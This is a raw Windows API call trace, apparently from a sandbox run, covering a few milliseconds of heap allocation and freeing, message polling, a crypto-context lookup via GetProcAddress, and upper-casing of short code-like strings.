1 [0161.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0161.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.279] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0161.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0161.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0161.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0161.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0161.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0161.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0161.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0161.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0161.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0161.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0161.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0161.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0161.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0161.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0161.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466dd0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0161.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0161.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0161.281] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0161.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0161.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0161.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0161.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466dd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0161.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0161.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0161.282] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0161.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0161.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b39d0 | out: hHeap=0x25c0000) returned 1 [0161.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0161.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0161.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0161.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0161.282] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xab2890) returned 1 [0161.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0161.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0161.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0161.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0161.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0161.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0161.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0161.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0161.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0161.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0161.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0161.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.284] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0161.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0161.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0161.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.284] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0161.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0161.285] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0161.285] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0161.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0161.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0161.285] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0161.285] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.285] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0161.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0161.285] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.285] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.285] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.286] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0161.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0161.286] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0161.286] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0161.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.286] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0161.286] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.286] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0161.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.286] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.286] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.287] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0161.287] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0161.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0161.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0161.287] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0161.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0161.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0161.287] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0161.287] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0161.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0161.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0161.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0161.287] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0161.287] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.288] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0161.288] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0161.288] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0161.288] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0161.288] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0161.288] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0161.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0161.288] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0161.288] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0161.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0161.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0161.289] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0161.289] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.289] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0161.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0161.290] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0161.290] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0161.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0161.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0161.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0161.290] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0161.290] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.290] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0161.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0161.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0161.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0161.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0161.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0161.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0161.291] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.291] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0161.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0161.291] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0161.291] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0161.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 